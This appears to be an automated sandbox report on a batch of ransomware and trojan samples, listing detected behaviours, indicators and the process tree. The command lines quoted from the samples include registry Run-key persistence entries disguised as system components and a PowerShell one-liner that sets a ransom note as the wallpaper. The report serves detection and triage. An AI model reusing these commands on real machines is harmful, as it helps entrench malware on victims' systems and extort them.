Analysis Overview
SHA256
4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
Threat Level: Known bad
The file RNSM00486.7z was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Djvu Ransomware
Detected Djvu ransomware
Avoslocker Ransomware
Renames multiple (141) files with added filename extension
Modifies Windows Firewall
Checks computer location settings
UPX packed file
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Uses Tor communications
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-10 18:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-10 18:03
Reported
2024-09-10 18:10
Platform
win10v2004-20240802-en
Max time kernel
75s
Max time network
363s
Command Line
Signatures
Avoslocker Ransomware
Detected Djvu ransomware
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
njRAT/Bladabindi
Renames multiple (141) files with added filename extension
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00486\smss.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\Desktop\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\"" | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe" | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\"" | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sffnzaz6da = "C:\\Users\\Admin\\Desktop\\00486\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe" | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Uses Tor communications
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\TASKKILL.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google123.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1968 -ip 1968
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 272
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 296
C:\Users\Admin\Desktop\00486\Setup.exe
"C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Users\Admin\Desktop\00486\smss.exe
"C:\Users\Admin\Desktop\00486\smss.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
C:\Users\Admin\AppData\Roaming\Google123.exe
"C:\Users\Admin\AppData\Roaming\Google123.exe"
C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp" /SL5="$4036E,3291817,140800,C:\Users\Admin\Desktop\00486\Setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
C:\Users\Admin\AppData\Roaming\important files.exe
"C:\Users\Admin\AppData\Roaming\important files.exe" C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk2
C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk3
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-eee2c2013ccae9a42d281f1fb2515b422da0b690f7b0c2a67753dde366754e35.exe
HEUR-Trojan-Ransom.Win32.Generic-eee2c2013ccae9a42d281f1fb2515b422da0b690f7b0c2a67753dde366754e35.exe
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe
"C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-083dbc12b101020fc3a3391de52133589d2d07eeb526e9d6fb7e8452b326119f.exe
HEUR-Trojan.MSIL.Crypt.gen-083dbc12b101020fc3a3391de52133589d2d07eeb526e9d6fb7e8452b326119f.exe
C:\Users\Admin\AppData\Local\Temp\Clickermann.exe
"C:\Users\Admin\AppData\Local\Temp\Clickermann.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe
HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-2243db692345300fa85044165d51f647130d7ad6073c1560b11788bc86cad760.exe
HEUR-Trojan.MSIL.Crypt.gen-2243db692345300fa85044165d51f647130d7ad6073c1560b11788bc86cad760.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\AppData\Local\Temp\чит.exe.exe
"C:\Users\Admin\AppData\Local\Temp\чит.exe.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
"C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe
"C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe"
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-24d6bdcc1fd603ed16d96146e9dd9c3c876c19f70a0b262de431e5c333b43d49.exe
HEUR-Trojan.MSIL.Crypt.gen-24d6bdcc1fd603ed16d96146e9dd9c3c876c19f70a0b262de431e5c333b43d49.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\225480302.png /f
C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe
"C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"
C:\Windows\94000696690303050\winsvcs.exe
C:\Windows\94000696690303050\winsvcs.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-26e821bcc82ab2a0ca1415d7b1b33d09dcf9ca7a5b8bb53376804493367257ff.exe
HEUR-Trojan.MSIL.Crypt.gen-26e821bcc82ab2a0ca1415d7b1b33d09dcf9ca7a5b8bb53376804493367257ff.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-466841e0cfbae323f68ec6283ba91acd56ffe861c77a3c5f7c618bd2f715fca6.exe
HEUR-Trojan.MSIL.Crypt.gen-466841e0cfbae323f68ec6283ba91acd56ffe861c77a3c5f7c618bd2f715fca6.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-521798e7fc5b493255379ac100b4a7cc094c46d0ab0e572097bd6f5045cff824.exe
HEUR-Trojan.MSIL.Crypt.gen-521798e7fc5b493255379ac100b4a7cc094c46d0ab0e572097bd6f5045cff824.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-5aab1a11e7a841129342bf643c7916f2b6eb1f5de85d7dfe0a434a414b932bb4.exe
HEUR-Trojan.MSIL.Crypt.gen-5aab1a11e7a841129342bf643c7916f2b6eb1f5de85d7dfe0a434a414b932bb4.exe
C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-5d6272028e58571ac67a39a449ccd6666dad00ecc4fd457db918e4448284f236.exe
